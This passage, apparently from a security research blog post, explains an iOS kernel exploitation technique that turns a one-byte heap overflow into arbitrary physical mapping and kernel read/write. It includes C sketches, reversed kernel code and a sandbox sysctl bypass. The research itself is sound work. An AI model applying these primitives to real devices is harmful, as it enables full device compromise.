Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.

This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:

  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.

  3. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    a. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    b. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

    Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.

  4. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.

While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.

Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.

However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.

Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.

We start by creating the shared memory region in the kernel.

We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.

There are 3 fake vm_map_entry objects in the shared memory buffer, representing the 3 states of our mapping operation. To start, the "ready" entry forwards to the "done" entry, which loops back to itself.


We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).

A vm_map_copy of type KERNEL_BUFFER includes inline kernel data; overlapping what would be the "next" field in an ENTRY_LIST copy is the value of a pointer to the "ready" entry in our shared memory buffer. But at this point, the copy's type is KERNEL_BUFFER, so the "pointer" is really just inline data.
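
As a hedged sketch of this step, the out-of-line descriptor is just a standard complex Mach message; the holding port and data buffer below are placeholders, and in the real POC the buffer holds the fake vm_map_header so that the bytes at the right offset become the would-be "next" pointer.

#include <mach/mach.h>
#include <string.h>

typedef struct {
    mach_msg_header_t         header;
    mach_msg_body_t           body;
    mach_msg_ool_descriptor_t ool;
} ool_message_t;

/* Queue `size` bytes of out-of-line data on holding_port; the kernel copies the
 * data in as a vm_map_copy (KERNEL_BUFFER for small, non-shared buffers) and
 * keeps it until the message is received. */
static kern_return_t send_ool_data(mach_port_t holding_port, void *data, size_t size) {
    ool_message_t msg;
    memset(&msg, 0, sizeof(msg));
    msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
    msg.header.msgh_remote_port = holding_port;
    msg.header.msgh_size = sizeof(msg);
    msg.body.msgh_descriptor_count = 1;
    msg.ool.type       = MACH_MSG_OOL_DESCRIPTOR;
    msg.ool.address    = data;
    msg.ool.size       = (mach_msg_size_t)size;
    msg.ool.copy       = MACH_MSG_VIRTUAL_COPY;
    msg.ool.deallocate = FALSE;
    return mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0,
                    MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

Receiving this message later is what hands the (by then corrupted) copy to vm_map_copyout_internal().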


We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).

A one-byte overflow into the vm_map_copy changes its type from KERNEL_BUFFER to ENTRY_LIST. At this point, the inline data is now interpreted as a vm_map_header with a "next" field pointing to the "ready" entry.


We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.

Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.

Calling vm_map_copyout_internal() on the corrupted vm_map_copy will traverse the linked list, going from "ready" to "done" and spinning in an infinite loop on "done".


At this point, we have a kernel thread that is spinning ready to map any physical page we request.

To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".

To get ready to map a physical page, we make the "ready" entry point to itself and then make the "done" entry point to the "ready" entry. The for loop in vm_map_copyout_internal() will follow the updated link from the "done" entry to the "ready" entry then spin on "ready". This state indicates that we're ready to set up the physical mapping.


While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.

Now that the mapping primitive is "ready", we will modify the "mapping" entry to map the desired physical page. We mark it as wired and specify a vm_object and vm_page containing the physical address to map. Also, we make the "done" entry link to itself to ensure the mapping happens only once.


Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.

Finally, we map a page by simply linking the "ready" entry to the "mapping" entry, causing vm_map_copyout_internal() to follow the link and process the "mapping" entry. Since it is wired, it maps in the page right away. Then, once the mapping is complete, vm_map_copyout_internal() will follow the link and start spinning on the "done" entry, indicating that the operation has completed.
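
Putting the above steps together, here is a hedged sketch of the userspace side of the primitive. The fake_entry_t layout below is a simplified stand-in whose real field offsets must match the target kernel build, the shared buffer's userspace and kernel addresses are assumed to be known, and the waits and memory barriers between steps are elided.

#include <stdint.h>

/* Simplified stand-in for a fake vm_map_entry in the kernel/user shared buffer.
 * Field names/offsets are placeholders; the real layout comes from the kernel. */
typedef struct {
    volatile uint64_t vme_next;       /* kernel address of the next fake entry */
    uint64_t vme_start, vme_end;
    uint64_t wired_count;
    uint64_t vme_object, vme_offset;  /* fake vm_object pointer / offset */
} fake_entry_t;

static uint8_t      *shared_user;     /* shared buffer, userspace mapping */
static uint64_t      shared_kern;     /* shared buffer, kernel address */
static fake_entry_t *ready, *mapping, *done;

/* Translate a userspace pointer into the shared buffer to its kernel address. */
static uint64_t kaddr(void *uaddr) {
    return shared_kern + (uint64_t)((uint8_t *)uaddr - shared_user);
}

/* Map one physical page at va using the thread spinning in vm_map_copyout_internal(). */
static void map_physical_page(uint64_t va, uint32_t phys_page) {
    /* 1. Park the spinning thread on "ready": ready -> ready, then done -> ready. */
    ready->vme_next = kaddr(ready);
    done->vme_next  = kaddr(ready);
    /* (wait for the thread to migrate from "done" to "ready") */

    /* 2. Describe the mapping while the thread spins on "ready". The fake
     *    vm_object and vm_page (not shown) carry phys_page as vmp_phys_page. */
    mapping->vme_start   = va;
    mapping->vme_end     = va + 0x4000;   /* one 16K page */
    mapping->wired_count = 1;
    mapping->vme_next    = kaddr(done);
    done->vme_next       = kaddr(done);   /* ensure the mapping happens only once */
    (void)phys_page;

    /* 3. Release the thread: ready -> mapping. It calls pmap_enter_options() for
     *    the page and then spins on "done", signaling completion. */
    ready->vme_next = kaddr(mapping);
    /* (wait for the thread to reach "done"; the physical page is now mapped at va) */
}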


This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:

This is a screenshot of a device panic.

The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.

My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.

The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.

But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.

The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.

A map of DRAM. The first little slice at the beginning, and a bigger slice at the end, are reserved for coprocessors, while the vast bulk of DRAM in the middle is for the Application Processor.


At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.

As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.

However, I quickly ran into panics when trying to map the kernelcache:

panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"

This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.

The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.

In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.

if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}

if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}

The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.

And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.

Looking at the AP's DRAM over time, unmappable pages are scattered semi-randomly throughout the physical address space, and pages can both enter and exit PPL.
A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).

With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.

The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).

However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:

panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.

On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.

To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:

Mapping out the data in the (smaller) physical memory region before the AP carveout, it seems that there are in fact two segments: A larger read-only span containing __TEXT segments (i.e. code) for coprocessor firmwares, and a smaller writable span containing the corresponding __DATA segments of the same firmwares.

Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.

Nevertheless, code execution on these coprocessors should still be viable: just as KTRR does not prevent exploitation on the AP, the coprocessor __TEXT lockdown mitigation does not prevent exploitation on coprocessors. So, even though this mitigation makes things more difficult, at this point our plan of disabling a DART and using code execution on the coprocessor to write to a PPL-protected physical address should still work.

The voice of PPL

What did turn out to be a roadblock however was the DART/IOMMU lockdown enforced by PPL on the Application Processor. At boot, XNU parses the "pmap-io-ranges" property in the devicetree to populate the io_attr_table array, which stores page attributes for certain physical I/O addresses. Then, when trying to map the physical address, pmap_enter_options_internal() checks the attributes to see if certain mappings should be disallowed:

wimg_bits = pmap_cache_attributes(pn); // checks io_attr_table
if ( flags )
    wimg_bits = wimg_bits & 0xFFFFFF00 | (u8)flags;
pte |= wimg_to_pte(wimg_bits);
if ( wimg_bits & 0x4000 )
{
    xprr_perm = (pte >> 4) & 0xC | (pte >> 53) & 1 | (pte >> 53) & 2;
    if ( xprr_perm == 0xB )
        pte_perm_bits = 0x20000000000080LL;
    else if ( xprr_perm == 3 )
        pte_perm_bits = 0x20000000000000LL;
    else
        panic("Unsupported xPRR perm ...");
    pte = pte_perm_bits | pte & ~0x600000000000C0uLL;
}
pmap_enter_pte(pmap, pte_p, pte, vaddr);

Thus, we can only map the DART's I/O address into our process if bit 0x4000 is clear in the wimg field. Unfortunately, a quick look at the "pmap-io-ranges" property in the devicetree confirmed that bit 0x4000 was set for every DART:

    addr         len        wimg     signature
0x620000000, 0x40000000,       0x27, 'PCIe'
0x2412C0000,     0x4000,     0x4007, 'DART' ; dart-sep
0x235004000,     0x4000,     0x4007, 'DART' ; dart-sio
0x24AC00000,     0x4000,     0x4007, 'DART' ; dart-aop
0x23B300000,     0x4000,     0x4007, 'DART' ; dart-pmp
0x239024000,     0x4000,     0x4007, 'DART' ; dart-usb
0x239028000,     0x4000,     0x4007, 'DART' ; dart-usb
0x267030000,     0x4000,     0x4007, 'DART' ; dart-ave
...
0x8FC3B4000,     0x4000, 0x40004016, 'GUAT' ; sgx.gfx-handoff-base

Thus, we cannot map the DART into userspace to disable it.

The palantír

Even though PPL prevents us from mapping page tables and DART I/O addresses, the physical I/O addresses for other hardware components are still mappable. Thus, it is still possible to map and read some system component's hardware registers to try and locate the kernel.

My initial attempt was to read from IORVBAR, the Reset Vector Base Address Register accessible via MMIO. The reset vector is the first piece of code that executes on a CPU after it resets; thus, reading IORVBAR would give us the physical address of XNU's reset vector, which would pinpoint the kernelcache in physical memory.

IORVBAR is mapped at offset 0x40000 after the "reg-private" address for each CPU in the devicetree; for example, on A13 CPU 0 it is located at physical address 0x210050000. It is part of the same group of register sets containing CoreSight and DBGWRAP that had been previously used to bypass KTRR. However, I found that IORVBAR is not accessible on A13: trying to read from it will panic.

I spent some time searching the A13 SecureROM for interesting physical addresses before Jann Horn suggested that I map the KTRR lockdown registers on the AMCC, Apple's memory controller. These registers store the physical memory bounds of the KTRR region in order to enforce the KTRR readonly region against attacks from coprocessors.

The AMCC has MMIO registers that store the physical addresses of the bounds of the KTRR lockdown region.


Mapping and reading the AMCC's RORGNBASEADDR register at physical address 0x200000680 worked like a charm, yielding the start address of the lockdown region containing the kernelcache in physical memory. Using security mitigations to break other security mitigations is fun. :)
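
A hedged sketch of that lookup, using the mapping primitive from Part I: the scratch virtual address is a placeholder, 0x200000680 is the A13 register address quoted above, and how the raw register value encodes the base of the lockdown region (its width and any shift relative to the DRAM base) is hardware-specific and not shown here.

#include <stdint.h>

/* The physical mapping primitive sketched earlier; pn is a 16K page number. */
extern void map_physical_page(uint64_t va, uint32_t pn);

static uint64_t read_amcc_rorgn_base(void) {
    const uint64_t amcc_page  = 0x200000000;   /* AMCC MMIO page (A13) */
    const uint64_t scratch_va = 0x300000000;   /* placeholder mapping address */
    map_physical_page(scratch_va, (uint32_t)(amcc_page >> 14));
    /* RORGNBASEADDR is at physical 0x200000680, i.e. offset 0x680 into that page. */
    uint64_t raw = *(volatile uint32_t *)(scratch_va + 0x680);
    /* Decoding the raw value into a full physical address is left out; the point is
     * that the start of the KTRR lockdown region can simply be read back. */
    return raw;
}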

The back gate is closed

After finding a definitive way forward using AMCC, I looked at one last possibility before giving up on bypassing PPL.

iOS is configured with 40-bit physical addresses and 16K pages (14 bits). Meanwhile, the arbitrary physical page number passed to pmap_enter_options_internal() is 32 bits, and is shifted by 14 and masked with 0xFFFF_FFFF_C000 when inserted into the level 3 translation table entry (L3 TTE). This means that we could control bits 45 - 14 of the TTE, even though bits 45 - 40 should always be zero based on the physical address size programmed in TCR_EL1.IPS.

If the hardware ignored the bits beyond the maximum supported physical address size, then we could bypass PPL by supplying a physical page number that exactly matches the DART I/O address or page table page, but with one of the high bits set. Having the high bits set would cause the mapped address to fail to match any of the addresses in "pmap-io-ranges", even though the TTE would map the same physical address. This would be neat as it would allow us to bypass PPL as a precursor to kernel read/write/execute, rather than the other way around.
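
As a tiny illustration of the idea (hypothetical only, since as noted next the hardware rejects it):

#include <stdint.h>

/* If the MMU ignored translation-table output-address bits above the 40-bit
 * physical address size (it does not), a page number with a high bit set would
 * fail to match any "pmap-io-ranges" entry while still mapping the same page. */
static uint32_t alias_page_number(uint64_t io_phys_addr) {
    uint32_t ppn = (uint32_t)(io_phys_addr >> 14);   /* real 16K page number */
    return ppn | (1u << 26);                         /* bit 26 of pn => bit 40 of the PA */
}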

Unfortunately, it turns out that the hardware does in fact check that TTE bits beyond the supported physical address size are zero. Thus, I went forward with the AMCC trick to locate the kernelcache instead.

The taming of sysctl

At this point, we have a physical read/write primitive for non-PPL physical addresses, and we know the address of the kernelcache in physical memory. The next step is to build a virtual read/write primitive.

I decided to stick with known techniques for this part: using the fact that the sysctl_oid tree used by the sysctl() syscall is stored in writable memory in the kernelcache to manipulate it and convert benign sysctls allowed by the app sandbox into kernel read/write primitives.

XNU inherited sysctls from FreeBSD; they provide access to certain kernel variables to userspace. For example, the "hw.l1dcachesize" readonly sysctl allows a process to determine the L1 data cache line size, while the "kern.securelevel" read/write sysctl controls the "system security level" used for some operations in the BSD portion of the kernel.

The sysctls are organized into a tree hierarchy, with each node in the tree represented by a sysctl_oid struct. Building a kernel read primitive is as simple as mapping the sysctl_oid struct for some sysctl that is readable in the app sandbox and changing the target variable pointer (oid_arg1) to point to the virtual address we want to read. Invoking the sysctl then  reads that address.

An example sysctl_oid struct in the kernelcache.
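
As a hedged sketch of the read primitive: assume the physical mapping primitive has been used to map the kernelcache page holding the sysctl_oid of some sandbox-readable sysctl whose handler simply reads through oid_arg1, and that oid_arg1_uaddr is the userspace address of that field within our mapping. The sysctl name below is a placeholder for such a node.

#include <stdint.h>
#include <stddef.h>
#include <sys/sysctl.h>

/* Placeholder: must be readable inside the app sandbox and backed by a plain
 * variable through oid_arg1 on the target kernel. */
#define TARGET_SYSCTL "hw.somereadablesysctl"

static uint32_t kread32(volatile uint64_t *oid_arg1_uaddr, uint64_t kvaddr) {
    uint64_t original = *oid_arg1_uaddr;
    *oid_arg1_uaddr = kvaddr;        /* point the sysctl's backing variable at kvaddr */
    uint32_t value = 0;
    size_t size = sizeof(value);
    sysctlbyname(TARGET_SYSCTL, &value, &size, NULL, 0);  /* returns *(uint32_t *)kvaddr */
    *oid_arg1_uaddr = original;      /* restore the sysctl afterwards */
    return value;
}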


Using sysctls to build a write primitive is a bit more complicated, since no sysctls are listed as writable in the container sandbox profile. The ziVA exploit for iOS 10.3.1 worked around this by changing the oid_handler field of the sysctl to call copyin(). However, on PAC-enabled devices like the A13, oid_handler is protected with a PAC, meaning that we cannot change its value.

However, when disassembling the function hook_system_check_sysctlbyname() that implements the sandbox check for the sysctl() system call, I noticed an interesting undocumented behavior:

// Sandbox check sysctl-read
ret = sb_evaluate(sandbox, 116u, &context);
if ( !ret )
{
    // Sandbox check sysctl-write
    if ( newlen | newptr && (namelen != 2 || name[0] != 0 || name[1] != 3) )
        ret = sb_evaluate(sandbox, 117u, &context);
    else
        ret = 0;
}

For some reason, if the sysctl node is deemed readable inside the sandbox, then the write check is not performed on the specific sysctl node { 0, 3 }! What this means is that { 0, 3 } will be writable in every sandbox from which it is readable, regardless of whether or not the sandbox profile allows writes to that sysctl.

As it turns out, the name of the sysctl { 0, 3 } is "sysctl.name2mib", which is a writable sysctl used to convert the string-name of a sysctl into the numeric form, which is faster to look up. It is used to implement sysctlnametomib(). So it makes sense that this sysctl should usually be writable.
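
For reference, { 0, 3 } is exercised with an ordinary sysctl() call; because newp is non-NULL, the call counts as a sysctl "write" for sandboxing purposes, which is exactly the check that gets skipped. A minimal usage sketch:

#include <sys/sysctl.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    int mib[2] = { 0, 3 };                /* the name2mib node */
    int oid[CTL_MAXNAME];
    size_t oidlen = sizeof(oid);
    const char *name = "hw.l1dcachesize";
    /* The "write" is the sysctl name passed as new data; the resolved numeric OID
     * comes back as old data. This is how sysctlnametomib() is implemented. */
    if (sysctl(mib, 2, oid, &oidlen, (void *)name, strlen(name)) == 0)
        printf("resolved a %zu-level OID\n", oidlen / sizeof(int));
    return 0;
}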

The upshot is that even though there are no writable sysctls specified in the sandbox profile, sysctl { 0, 3 } is in fact writable anyways, allowing us to build a virtual write primitive alongside our read primitive. Thus, we now have full arbitrary kernel read/write.

III - The Return of the Copyout

The battle of pmap fields

We have come far, but the journey is not yet done: we must break the ring. As things stand, vm_map_copyout_internal() is spinning in an infinite loop on the "done" vm_map_entry, whose vme_next pointer points to itself. We must guide the safe return of this function to preserve the stability of the system.

Looking back to the vm_map_copyout_internal() function, we are currently spinning in an infinite loop on the "done" entry, having just finished mapping a page.


There are two basic issues preventing this. First, because we've inserted entries into our page tables at the pmap layer without creating corresponding virtual entries at the vm_map layer, there is currently an accounting conflict between the pmap and vm_map views of our address space. This will cause a panic on process exit if not addressed. Second, once the loop is broken, vm_map_copyout_internal() has a call to vm_map_copy_insert() that will panic trying to free the corrupted vm_map_copy to the wrong zone.

We will address the pmap/vm_map conflict first.

Suppose for the moment that we were able to break out of the for loop and allow vm_map_copyout_internal() to return. The call to vm_map_copy_insert() that occurs after the for loop walks through all the entries in the vm_map_copy, unlinks them from the vm_map_copy's entry list, and links them into the vm_map's entry list instead.

static void
vm_map_copy_insert(
    vm_map_t        map,
    vm_map_entry_t  after_where,
    vm_map_copy_t   copy)
{
    vm_map_entry_t  entry;

    while (vm_map_copy_first_entry(copy) !=
               vm_map_copy_to_entry(copy)) {
        entry = vm_map_copy_first_entry(copy);
        vm_map_copy_entry_unlink(copy, entry);
        vm_map_store_entry_link(map, after_where, entry,
            VM_MAP_KERNEL_FLAGS_NONE);
        after_where = entry;
    }
    zfree(vm_map_copy_zone, copy);
}

Since the vm_map_copy's vm_map_entrys are all fake objects residing in shared memory, we really do not want them linked into our vm_map's entry list, where they will be freed on process exit. The simplest solution is thus to update the corrupted vm_map_copy's entry list so that it appears to be empty.

Forcing the vm_map_copy's entry list to appear empty certainly lets us safely return from vm_map_copyout_internal(), but we would nevertheless still get a panic once our process exits:

panic(cpu 3 caller 0xfffffff01f4b1c50): "pmap_tte_deallocate(): pmap=0xfffffff06cd8fd10 ttep=0xfffffff0a90d0408 ptd=0xfffffff132fc3ca0 refcnt=0x2 \n"

The issue is that during the course of the exploit, our mapping primitive forces pmap_enter_options() to insert level 3 translation table entries (L3 TTEs) into our process's page tables, but the corresponding accounting at the vm_map layer never happens. This disagreement between the pmap and vm_map views matters because the pmap layer requires that all physical mappings be explicitly removed before the pmap can be destroyed, and the vm_map layer will not know to remove a physical mapping if there is no vm_map_entry describing the corresponding virtual mapping.

Due to PPL, we can not update the pmap directly, so the simplest solution is to grab a pointer to a legitimate vm_map_entry with faulted-in pages and overlay it on top of the virtual address range at which pmap_enter_options() established our physical mappings. Thus we will update the corrupted vm_map_copy's entry list so that it points to this single "overlay" entry instead.

The fires of stack doom

Finally, it is time to break vm_map_copyout_internal() out of the for loop.

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

The macro vm_map_copy_to_entry(copy) expands to:

    (struct vm_map_entry *)(&copy->c_u.hdr.links)

Thus, in order to break out of the loop, we need to process a vm_map_entry with vme_next pointing to the address of the c_u.hdr.links field in the corrupted vm_map_copy originally passed to this function.

The function is currently spinning on the "done" vm_map_entry, and we need to link in one final "overlay" vm_map_entry to address the pmap/vm_map accounting issue anyway. So the simplest way to break the loop is to modify the "overlay" entry's vme_next to point to &copy->c_u.hdr.links and then update the "done" entry's vme_next to point to the overlay entry.

To break out of the loop, we will have to link the "done" entry to an "overlay" entry that links back to the corrupted vm_map_copy.


The problem is the call to vm_map_copy_insert() mentioned earlier, which frees the vm_map_copy as if it were of  type ENTRY_LIST:

    zfree(vm_map_copy_zone, copy);

However, the object passed to zfree() is our corrupted vm_map_copy, which was allocated with kalloc(); trying to free it to the vm_map_copy_zone will panic. Thus, we somehow need to ensure that a different, legitimate vm_map_copy object gets passed to the zfree() instead.

Fortunately, if you check the disassembly of vm_map_copyout_internal(), the vm_map_copy pointer is spilled to the stack for the duration of the for loop!

FFFFFFF007C599A4     STR     X28, [SP,#0xF0+copy]
FFFFFFF007C599A8     LDR     X25, [X28,#vm_map_copy.links.next]
FFFFFFF007C599AC     CMP     X25, X27
FFFFFFF007C599B0     B.EQ    loc_FFFFFFF007C59B98
...                             ; The for loop
FFFFFFF007C59B98     LDP     X9, X19, [SP,#0xF0+dst_addr]
FFFFFFF007C59B9C     LDR     X8, [X19,#vm_map_copy.offset]

This makes it easy to ensure that the pointer passed to zfree() is a legitimate vm_map_copy allocated from the vm_map_copy_zone: just scan the kernel stack of the vm_map_copyout_internal() thread while it's still spinning and swap any pointers to the corrupted vm_map_copy with the legitimate one.

Replacing the corrupted vm_map_copy with a valid vm_map_copy that can be safely freed simply requires changing pointers on the kernel stack to point to the replacement copy instead.
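
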